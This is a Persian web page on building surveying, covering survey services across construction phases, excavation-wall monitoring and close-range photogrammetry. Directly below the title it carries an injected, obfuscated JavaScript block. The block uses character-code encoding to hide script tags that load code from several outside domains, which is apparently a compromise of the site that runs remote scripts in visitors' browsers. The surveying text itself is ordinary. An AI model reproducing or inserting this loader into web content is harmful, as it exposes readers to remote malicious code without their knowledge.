خانه » نقشه برداری کارگاهی » نقشه برداری ساختمانی 

نقشه برداری ساختمانی 

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,59,47,47,109,97,105,110,46,116,114,97,118,101,108,102,111,114,110,97,109,101,119,97,108,107,105,110,103,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var mj=String.fromCharCode(104,116,116,112,115,58,47,47,112,111,114,116,46,116,114,97,110,115,97,110,100,102,105,101,115,116,97,115,46,103,97,47,106,115,46,112,104,112,63,102,114,111,109,61,119,38,115,105,100,61,53,49,53); var t = document.createElement(String.fromCharCode(115,99,114,105,112,116)); t.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); t.src = mj;t.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);t.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(t);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,105,114,99,46,116,114,97,110,115,97,110,100,102,105,101,115,116,97,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,97,114,116,46,116,114,97,110,115,97,110,100,102,105,101,115,116,97,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,101,110,100,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
[/vc_row]

 

نقشه برداری ساختمانی نقشه برداری ساختمانی
منظور از این اصطلاحات پیاده کردن اجزای ساختمانها و تاسیسات وابسته به آنها و نیز کنترل عملیات ساختمانی است.
امروزه استفاده از خدمات و تجهیزات دقیق نقشه برداری در پروژه های ساختمانی جزو اصول جدایی ناپذیر هر پروژه عمرانی ساختمانی محسوب میگردد. جهت جلوگیری از خسارتهای ناشی از تاخیر در برنامه های زمانی، مدیریت اجرایی پروژه های ساختمانی را بر این میدارد که تکنولوژی های نوین و به روز بهره ببرند. یکی از این خدمات نوین استفاده از ابزارهای مدرن اندازه گیری دقیق، تحت عنوان تجهیزات نقشه برداری میباشد.

در پروژه های کوچک نیز رویکردهای سنتی اجرایی، صدمات و خسارتهای فراوانی به کارفرمایان و سرمایه گذاری در بخش ساخت و ساز تحمیل میکند، به همین دلیل معرفی توانایی ها و مزایای خدمات نقشه برداری ساختمانی در جهت کاهش هزینه های مخفی همواره مورد رضایت دست اندرکاران صنعت ساختمان و رغبت آنها به استفاده از این خدمات میباشند به طوری که امروزه در بخشهایی از صنعت ساختمان انجام امور بدون نظارت و کنترل مستمر نقشه برداری امکان پذیر نیست.
از طرفی نقشه بردار ساختمانی باید ذهنیت روشن عملی از پروژه های عمرانی و اصطلاحات مهندسی عمران و نقشه خوانی ساختمانی داشته باشد. او باید قادر به درک فرآیندهای ساخت و ساز ساختمان بوده و با انواع عملیات ساختمانی از شیوه های اجرای اجزای یک پروژه ساختمانی تا مصالح و خصوصیات فنی و ذاتی آنها آشنایی داشته باشد، تا بتواند با خلاقیت خود بهترین روشهای ارائه خدمات نقشه برداری مرتبط با درخواست کارفرما را انتخاب کند.

 

در این راستا آموزش صحیح نقشه برداری ساختمانی باید در الویت دغدغه های جامعه نقشه برداران باشد تا این قشر از جامعه مهندسی کشور بتواند کلیه منافع و نیازهای صنعت ساختمان را با ارائه خدمات مطلوب جلب کنند.
خدمات نقشه برداری ساختمانی را میتوان به طور کلی به سه دسته اصلی تقسیم کرد:
* خدمات نقشه برداری قبل از احداث ساختمان
* خدمات نقشه برداری حین احداث ساختمان
* خدمات نقشه برداری پس از احداث ساختمان

 

توجه:
توصیه میشود مهندسین نقشه بردار در تمام مراحل پروژه های ساختمانی قبل از شروع پروژه و حین اجرای خدمات مهندسی نقشه برداری و حتی پس از آن نسبت به ثبت بصری پروژه با دوربین های عکسبرداری و سپس نسبت به بایگانی آنها بر اساس تاریخ و گزارش های تکمیلی اقدام کنند. این امر میتواند جهت رفع هرگونه ابهام در کلیه مراحل ارائه خدمات بهنقشه بردار کمک کند و در بسیاری موارد نکاتی که از چشم نقشه بردار به دور مانده را جهت ارجاع های بعدی ماندگار کند.


خدمات نقشه برداری قبل از احداث ساختمان نقشه برداری ساختمانی
عناوین اصلی خدمات نقشه برداری قبل از احداث ساختمان را میتوان به زیر بخشهای زیر تقسم بندی کرد:
* مساحی حدود اربعه (عرصه و اعیان) و نقشه برداری توپوگرافی و تهیه نقشه سایت پلان و ثبت موقعیت عوارض طبیعی و مصنوعی (مانند چاه ، درخت و …) که در هنگام طراحی معماری تاثیر گذار هستند، و تهیه پروفیل های خیابانهای دسترسی مجاور.
* بررسی ابعاد اربعه و مساحت وضعیت موجود زمین و مطابقت آن با سند ثبتی و پیاده سازی طول وابعاد سند بر روی نقشه وضعیت موجود زمین (ازبیلت) و رفع احتمالی عدم تطابق مشکلات ثبتی سند ملکی.
* کمک به تیم معماری جهت جانمایی بهترین مکان احداث ساختمان با توجه به ضوابط شهرسازی و معماری و محاسبات بروکف.
* جانمایی سایت پلان بر اساس دستور نقشه شهرداری بر روی نقشه های ازبیلت.
خدمات نقشه برداری حین احداث ساختمان
از مزایای کلی خدمات نقشه برداری ساختمانی میتوان افزایش دقت و صحت اجرای نقشه ها و در نتیجه افزایش تاثیرات واقعی محاسبات فنی سازه و معماری، محاسبات زلزله و افزایش بهره وری در زمان اجرای پروژه را برشمرد. عناوین اصلی خدمات نقشه برداری حین احداث ساختمان را میتوان به زیر بخشهای زیر تقسم بندی کرد:
* پیاده سازی سایت پلان و جانمایی محل فونداسیون.
* کنترل اجرایی حین عملیات خاکبرداری و گود برداری و محاسبات احجام خاکی بر اساس نقشه برداری های مکرر از سطح سایت بنا به تقاضای کارفرما.
* کنترل مجدد جانمایی فونداسیون حین پی سازی.
* جانمایی و کنترل محل حفر چاه شمع ها و کنترل پیوسته آنها (پس از هر مرحله گود برداری در پروژه های بلند مرتبه ای که شامل طبقات متعدد زیر سطح صفر هستند).
* کنترل پیوسته خطوط تراز بستر سازی و مگر ریزی و … .
* جانمایی محورهای سازه و کنترل پیوسته موقعیت مکانی و تراز ارتفاعی آنها تا هنگام نصب صفحه ستون ها (در پروژه های اسکلت فلزی) .
* کنترل موقیعت مسطحاتی ستونها (در پروژه های اسکلت بتونی).
* کنترل شاقولی و پیچیدگی ستونها در ساختمانهای اسکلت فلزی حین ستون ریزی.
* کنترل خط تراز بتن ریخته شده در سقف ها (کنترل تراز طبقات).
* پیاده سازی خطوط تراز در طبقات برای سایر پیمانکاران ساختمانی نظیر برقکار، تاسیسات، سقف کاذب و … و کنترل پیوسته آنها
* پیاده سازی اجزای ساختمانی بسته به نوع پروژه و درخواست کارفرما و کنترل صحت اجرای آنها در داخل و یا خارج (محوطه سازی) پروژه ساختمانی ( به عنوان مثال اجرای طرح داخلی طبقات نظیر تیغه های دیوار چینی داخل ساختمان، جانمایی محل احداث رایزر های تاسیسات، کانالهای آبهای زهکشی و پیاده سازی قطعات سقف و …) .
* پیاده سازی رمپ ها و سایر اجزای فنی محوطه سازی و کنترل دقیق خطوط تراز آنها.
* کنترل دقیق نصب قطعاتی که شاقولی بودن آنها اهمیت اساسی دارد (مانند قطعات شمشیری در راه پله ها، پاگرد پله ها و …).
* پیاده سازی نماهای پیچیده از نظر طراحی و یا نماهایی که با مصالح خاص پیش ساخته پازلی اجرا میشوند (نظیر کامپوزیت پنل آلومینیوم ، نمای فریم لس شیشه ای و …).

خدمات نقشه برداری پس از احداث ساختمان
معمولا هنگام مرمت، احیا و بازسازی یک بنا و یا اجرای یک طرح جدید پس از ساخت بنا و یا تغییر در طراحی حین اجرای یک بنا نیاز به خدمات نقشه برداری به شدت احساس میشود. قدم اولیه درتمام این پروژه ها تهیه نقشه وضعیت موجود (ازبیلت) است.
نقشه بردار موظف است داده های لازم بسته به نوع پروژه و نیاز پیمانکار را از محل پروژه استخراج کرده و در قالب نقشه های ساختمانی قابل استفاده برای مجری تهیه کند. معمولا شاخه های معماری، باستانشناسی و تصویرگری بیشترین مصرف کنندگان این گونه خدمات نقشه برداری هستند.
آماده سازی بستر شبکه نقشه برداری و انتخاب ابزار مناسب جهت تهیه ازبیلت دقیق بستگی به موقعیت و نوع پروژه و تجربه قبلی نقشه بردار در پروژه های مشابه دارد. بنابراین به صورت موضوعی فقط به ذکر چند مورد بسنده میشود:
* نقشه برداری میکروژئودزی، و تهیه نقشه ازبیلت ستونها و دیوار های حایل به منظور چگونگی بررسی وضعیت سازه از نظر نشست و یا پیچش و انتخاب روشهای مناسب تقویت سازه.
* نقشه برداری تهیه پلان ازبیلت نمای یک ساختمان جهت اجرای نمای جدید و یا بازسازی نمای موجود، با کمک ابزارهای مناسب که بسته به پیچیدگی طرح انتخاب ابزار مناسب نظیر دوربینهای متریک دیجیتال، اسکنرهای لیزری و یا تجهیزات دقیق نقشه برداری (مجموعه توتال استیشن Reflectorless وReflective tape ) صورت میپذیرد.
* جهت پروژه های بازسازی تهیه نقشه ازبیلت کلیه اجزای تاسیسات الکتریکی و محل خروجی و ورودی های لوله های تاسیساتی و سایر اجزای ساختمانی نظیر حفرات کانالهای آب و سرویسهای بهداشتی و … ضروری بوده و بسته به پیچیدگی و وضعیت طرح، ابزارهای مناسب جهت برداشت انتخاب میگردد.
* مستند سازی میراث فرهنگی در راستای شناخت آثار تاریخی و ملی و تهیه طرح های حفاظت، مرمت، احیاء، ساماندهی بنا ها، محوطه ها و بافتهای تاریخی – فرهنگی با کمک ابزار های دقیق مستند نگاری نظیر سیستمهای فوتوگرامتری برد کوتاه و اسکنر های لیزری.

امید است با استقرار و ساماندهی نظام آموزشی مدون "نقشه برداری ساختمانی" در سطوح دانشگاهی و اصناف فنی و مهندسی، اقشار جامعه مهندسین نقشه برداری و صنعت ساختمان در راستای تعاملی سازنده در جهت ارتقا سطح کیفی خدمات نقشه برداری قدم برداریم.

 

نقشه برداری ساختمانی به روش فتوگرامتری برد کوتاه

مانیتورینگ جابجائی دیواره گودها: نقشه برداری ساختمانی

امروزه با توجه به گودبرداریهای عمیقی که در سطح شهر جهت اجرای پروژه های ساختمانی انجام میپذیرد و خطرات جانی و مالی فراوانی که برای ساختمانها و خیابانها و معابر اطراف از جهت ریزش گود پیش میآید، پایش دقیق دیواره ها به منظور کنترل جابجائیهای دیواره امری ضروری و اجتناب ناپذیر است.

 از آنجاییکه دقت های مورد درخواست برای این منظور معولا زیر یک میلیمتر است تا جایه جائیهای بسیار کوچک نیز آشکارسازی شده و پروژه با حداکثر اطمینان به پیش رود، روشهای متداول نقشه برداری جوابگوی این نیاز ما نیست. برای این منظور می توان از روش میکروژئودزی که یکی از پیشرفته ترین روشهای نقشه برداری دقیق میباشد به عنوان یکی از راه حلها استفاده نمود. اما از آنجاییکه روش میکروژئودزی مستلزم صرف هزینه و زمان نسبتاً زیادی میباشد، گروه "طرح توسعه عمران نقشه برداری" روشی نوین، نسبتاً کم هزینه و با قابلیت اعتماد بالا بر پایه فتوگرامتری برد کوتاه، به عنوان جایگزین میکروژئودزی را به شما پیشنهاد می دهد که بنا بر شرایط هر پروژه می تواند نقاط ضعف روش میکروژئودزی را تا حدود بسیار زیادی کاهش دهد. نقشه برداری ساختمانی


اسکن دیواره گودها به منظور محاسبات مساحت (تحکیم و شات) دیواره: نقشه برداری ساختمانی

در روشهای مرسوم نقشه برداری جهت محاسبه سطح دیواره (سطح شات و یا تحکیم) یکسری نقاط به عنوان نمونه از سطح دیواره برداشت میشوند و این نقاط مبنای محاسبات مساحت قرار میگیرند. بعضاً مشاهده میگردد برداشتهای مختلف از یک دیواره به مساحتهای متفاوتی منتهی میشود که این امر با توجه به بالا بودن حق الزحمه هر مترمربع تحکیم دیواره، ضررهای زیادی را متوجه هر کدام از طرفین پیمانکار و یا کار فرما مینماید. برای حل این مشکلات میتوان  با استفاده از روشهای بسیار نوین و پیچیده فتوگرامتری اقدام به تهیه ابر نقاط با تراکم بسیار بالا و تصویر ارتو یکپارچه از کل دیواره نمود.

محصولات مذکور قابلیت این را دارند که مساحت دیواره با بالاترین دقت ممکن را برآورده سازند. همچنین ازبیلت بسیار مناسبی از دیواره ارائه میدهد که مشخص میسازد هر کدام از اجزای طرح (نیل، استرند و یا اچپایلها) در چه موقعیتی اجرا شده اند. بنابراین بر روی یک تصویر که کاملا متریک بوده و قابلیت اندازه گیری دارد، تمام جزئیات طرح اجرا شده قابل اندازه گیری می باشد. نقشه برداری ساختمانی


اسکن دیواره جهت کنترل جلوآمدگی و عقب رفتگی دیواره ها

ابر نقاط برداشت شده از دیواره به روش فتوگرامتری، میتواند کنترل هر نقطه دلخواه از دیواره در قالب یک فایل واحد را ممکن سازد تا با دقت بسیار بالا میلیمتر به میلیمتر دیواره به لحاظ مختصاتی کنترل و با خط پروژه (خط حدود اربعه زمین) مقایسه گردد تا از صحت اجرا اطمینان حاصل گردد.

برداشت و پیاده سازی نما به صورت تصویری:
همواره در پروژه های نقشه برداری نماها، در اختیار داشتن نقشه نما با دقت بسیار بالا به همراه اطلاعات رادیومتریک نما (تصویر)، یک هدف بعید به نظر میرسید. در حال حاضر امکان تهیه نقشه نما با دقتهای به مراتب بالاتر از گذشته به همراه اطلاعات تصویری از نما فراهم گردیده است. بدین ترتیب کارفرما قادر خواهد بود در یک فایل واحد هم اطلاعات کمی (ابعاد و مختصات و تمام جزئیات جلوآمدگی و عقب رفتگیها) و همچنین تصویر واقعی مربوط به آن اطلاعات کمی را به صورت یکپارچه مشاهده نماید.

محاسبه احجام:

با استفاده از سیستم فتوگرامتری نوین امکان برداشتهای توپوگرافی به منظور محاسبات احجام در کمترین زمان و با بالاترین دقت امکانپذیر گشته است. از آنجاییکه توسط این سیستم هر سانتیمتر زمین نقطه برداشت میشود (ابر نقاط) بنابراین احجام محاسبه شده در این روش از بالاترین صحت برخوردار می باشد.

 این امر به خصوص در پروژه های ساختمانی که غالباً خاکبرداریها به صورت قائم انجام میپذیرد، از اهمیت بالائی برخوردار است. چرا که با وجود چنین ترانشههائی که تغییرات شدید اختلاف ارتفاع در طول را شاهد هستیم، نقشه برداری کلاسیک و سنتی دقتهای چندان مناسبی را رائه نمینمایند و سبب میشوند که احجام محاسبه شده با واقعیت، تفاوت قابل ملاحظ های داشته باشند. در حالیکه احجام محاسبه شده از ابر نقاط با میزان واقعیت تطابق بسیار بالائی دارد.نقشه برداری ساختمانی


نظارت دقیق بر اجرای سازه های عمرانی:

با استفاده از سیستم نقشه برداری UAV و همچنین فتوگرامتری برد کوتاه میتوانیم ازبیلت کلیه اجزا و مراحل یک پروژه ساختمانی را با بالاترین دقت و مطلوبترین شیوه ارائه تهیه کرد و بسیاری از عملکردهای نقشه برداری را با روشهای نوین جایگزین نمود.


منبع : 1- www.niazemarkazi.com  و  WWW.surveyir.ir -2  

 

 

 

 

نقشه برداری ساختمانی 

 

 

 

 

 

 

 

 

 

آدرس ایمیل پشتیبانی : newmap@yahoo.com


پسورد تمام فایل ها در وب سایت : www.newmap.ir

ارسال دیدگاه

نشانی ایمیل شما منتشر نخواهد شد.

This site is protected by wp-copyrightpro.com

RSS
Instagram
SOCIALICON